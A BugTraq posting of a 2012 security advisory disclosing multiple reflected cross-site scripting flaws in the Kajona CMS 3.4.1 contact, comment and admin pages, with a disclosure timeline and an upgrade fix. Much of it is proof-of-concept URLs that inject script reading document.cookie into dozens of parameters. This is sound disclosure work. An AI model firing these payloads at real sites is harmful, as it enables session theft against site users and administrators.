BugTraq
Multiple Cross-Site Scripting (XSS) in Kajona Jul 11 2012 11:18AM
advisory htbridge com
Advisory ID: HTB23097
Product: Kajona
Vendor: www.kajona.de
Vulnerable Version(s): 3.4.1 and probably prior
Tested Version: 3.4.1
Vendor Notification: 20 June 2012
Vendor Patch: 26 June 2012
Public Disclosure: 11 July 2012
Vulnerability Type: Cross-Site Scripting (XSS)
CVE Reference: CVE-2012-3805
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Risk Level: Medium
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

------------------------------------------------------------------------
-----------------------

Advisory Details:

High-Tech Bridge Security Research Lab has discovered multiple Cross-Site Scripting (XSS) vulnerabilities in Kajona.

1) Multiple Cross-Site Scripting (XSS) in Kajona: CVE-2012-3805

1.1 Input passed via the "absender_name", "absender_email" and "absender_nachricht" GET parameters to /index.php (when "page" is set to "contact") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrate the vulnerabilities:

http://kajona/index.php?page=contact&absender_name=%22%3E%3Cscript%3Eale
rt%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=contact&absender_email=%22%3E%3Cscript%3Eal
ert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=contact&absender_nachricht=%3C/textarea%3E%
3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.2 Input passed via the "comment_name", "comment_subject" and "comment_message" GET parameters to /index.php (when "page" is set to "postacomment") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:

http://kajona/index.php?page=postacomment&comment_name=%22%3E%3Cscript%3
Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=postacomment&comment_subject=%22%3E%3Cscrip
t%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=postacomment&comment_message=%3C/textarea%3
E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.3 Input passed via the "module" GET parameter to /index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.

The following PoC demonstrates the vulnerability:

http://kajona/index.php?module=%3Cscript%3Ealert%28document.cookie%29;%3
C/script%3E

1.4 Input passed via the "action" GET parameter to /index.php (when "module" is set to "login" and "admin" is set to "1") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.

The following PoC demonstrates the vulnerability:

http://kajona/index.php?module=login&admin=1&action=%3Cscript%3Ealert%28
document.cookie%29;%3C/script%3E

1.5 Input passed via the "pv" and "pe" GET parameters to /index.php (when "module" is set to "user", "action" is set to "list" and "admin" is set to "1") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:

http://kajona/index.php?admin=1&module=user&action=list&pv=%22%3E%3Cscri
pt%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=list&pe=%22%3E%3Cscri
pt%3Ealert%28document.cookie%29;%3C/script%3E

1.6 Input passed via the "user_username", "user_email", "user_forename", "user_name", "user_street", "user_postal", "user_city", "user_tel" and "user_mobile" GET parameters to /index.php (when "module" is set to "user", "action" is set to "newUser" and "admin" is set to "1") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:

http://kajona/index.php?admin=1&module=user&action=newUser&user_username
=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_email=%2
2%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_forename
=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_name=%22
%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_street=%
22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_postal=%
22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_city=%22
%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_tel=%22%
3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_mobile=%
22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.7 Input passed via the "group_name" and "group_desc" GET parameters to /index.php (when "module" is set to "user", "action" is set to "groupNew" and "admin" is set to "1") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:

http://kajona/index.php?admin=1&module=user&action=groupNew&group_name=%
22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=groupNew&group_desc=%
3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.8 Input passed via the "name", "browsername", "seostring", "keywords" and "folder_id" GET parameters to /index.php (when "module" is set to "pages", "action" is set to "newPage" and "admin" is set to "1") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:

http://kajona/index.php?admin=1&module=pages&action=newPage&name=%22%3E%
3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&browsername=
%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&seostring=%2
2%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&keywords=%3C
/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&folder_id=%2
2%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.9 Input passed via the "element_name" and "element_cachetime" GET parameters to /index.php (when "module" is set to "pages", "action" is set to "newElement" and "admin" is set to "1") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:

http://kajona/index.php?admin=1&module=pages&action=newElement&element_n
ame=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newElement&element_c
achetime=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.10 Input passed via the "aspect_name" GET parameter to /index.php (when "module" is set to "system", "action" is set to "newAspect" and "admin" is set to "1") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC demonstrates the vulnerability:

http://kajona/index.php?admin=1&module=system&action=newAspect&aspect_na
me=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.11 Input passed via the "filemanager_name", "filemanager_path", "filemanager_upload_filter" and "filemanager_view_filter" GET parameters to /index.php (when "module" is set to "filemanager", "action" is set to "newRepo" and "admin" is set to "1") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:

http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filema
nager_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filema
nager_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filema
nager_upload_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scr
ipt%3E
http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filema
nager_view_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scrip
t%3E

1.12 Input passed via the "archive_title" and "archive_path" GET parameters to /index.php (when "module" is set to "downloads", "action" is set to "newArchive" and "admin" is set to "1") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:

http://kajona/index.php?admin=1&module=downloads&action=newArchive&archi
ve_title=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=downloads&action=newArchive&archi
ve_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

------------------------------------------------------------------------
-----------------------

Solution:

Upgrade to Kajona V3.4.2

More Information:
http://www.kajona.de/newsdetails.Kajona-V3-4-2-available.newsDetail.616d
ecb4fe9b7a5929fb.en.html
http://www.kajona.de/changelog_34x.de.html

------------------------------------------------------------------------
-----------------------

References:

[1] High-Tech Bridge Advisory HTB23097 - https://www.htbridge.com/advisory/HTB23097 - Cross-Site Scripting (XSS) in Kajona.
[2] Kajona - http://www.kajona.de/ - Open Source Content Management Framework.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

------------------------------------------------------------------------
-----------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus